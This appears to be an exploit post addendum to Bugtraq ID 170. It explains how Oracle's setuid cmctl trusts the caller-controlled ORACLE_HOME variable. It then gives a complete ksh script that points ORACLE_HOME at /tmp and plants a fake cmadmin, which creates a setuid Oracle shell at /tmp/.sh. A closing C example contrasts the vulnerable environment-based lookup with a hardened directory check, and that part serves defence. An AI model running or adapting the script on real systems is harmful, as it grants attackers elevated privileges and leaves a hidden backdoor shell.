This exploit script is an addendum to ID 170 in the Bugtraq database. ID 170 lists several Oracle setuid executables but does not offer any exploit information. This code exploits the cmctl command by violating its trust in the integrity of the ORACLE_HOME and ORA_HOME environment variables. When the command "cmctl start cmadmin" is executed, cmctl looks under the ORACLE_HOME/bin directory and attempts to execute cmadmin. Because cmctl runs setuid to Oracle and the caller controls ORACLE_HOME, modifying the variable changes the path of execution.
baabf3683d5e3e05e4139396752c7d9eb51dcf6e6f61509565b5d8a451188910
#! /usr/bin/ksh
#############################################
#
# cmctl is installed setuid to Oracle
# by default. See BugTraq ID 170 and Oracle
# bug id 701297 and 714293.
#
# This script will create a setuid Oracle shell,
# /tmp/.sh
#
# redirect environment variables
export ORACLE_HOME=/tmp
export ORAHOME=/tmp
mkdir /tmp/bin
chmod a+rx /tmp/bin
# create cmadmin script
cat <<EOF > /tmp/bin/cmadmin
cp /bin/sh /tmp/.sh
chmod u+s /tmp/.sh
chmod a+rx /tmp/.sh
EOF
chmod a+rx /tmp/bin/cmadmin
# run cmctl to create Oracle setuid shell
/oracle/products/V815/bin/cmctl start cmadmin
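
Added example, not part of the original script and not Oracle's code: the environment-trust flaw described above, shown in C as the vulnerable helper lookup beside a hardened one. All function names and the idea of a `trusted_home` fixed at install time are assumptions made for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Illustrative names throughout; this is not Oracle's code. */

/* Vulnerable pattern: the helper path comes from the caller's environment,
 * so whoever runs the setuid binary chooses what it executes. */
int unsafe_helper_path(char *out, size_t n, const char *helper)
{
    const char *home = getenv("ORACLE_HOME");
    if (home == NULL)
        return -1;
    return snprintf(out, n, "%s/bin/%s", home, helper) < (int)n ? 0 : -1;
}

/* Accept a directory only if it is a real directory (not a symlink), owned
 * by root or `owner`, and not writable by group or others. */
int dir_is_trusted(const char *dir, uid_t owner)
{
    struct stat st;
    if (lstat(dir, &st) != 0 || !S_ISDIR(st.st_mode))
        return 0;
    if (st.st_uid != 0 && st.st_uid != owner)
        return 0;
    return (st.st_mode & (S_IWGRP | S_IWOTH)) == 0;
}

/* Hardened lookup: never reads the environment. `trusted_home` is assumed to
 * be a constant fixed at build/install time. Returns 0 and fills `out`, or -1. */
int safe_helper_path(char *out, size_t n, const char *trusted_home,
                     const char *helper, uid_t owner)
{
    char bindir[4096];
    if (strchr(helper, '/') != NULL)      /* helper must be a bare file name */
        return -1;
    if (snprintf(bindir, sizeof bindir, "%s/bin", trusted_home) >= (int)sizeof bindir)
        return -1;
    if (!dir_is_trusted(bindir, owner))   /* refuses e.g. a world-writable bin */
        return -1;
    return snprintf(out, n, "%s/%s", bindir, helper) < (int)n ? 0 : -1;
}
```

A production check would also validate every parent directory and the helper file itself, and would execute the helper with a sanitized environment.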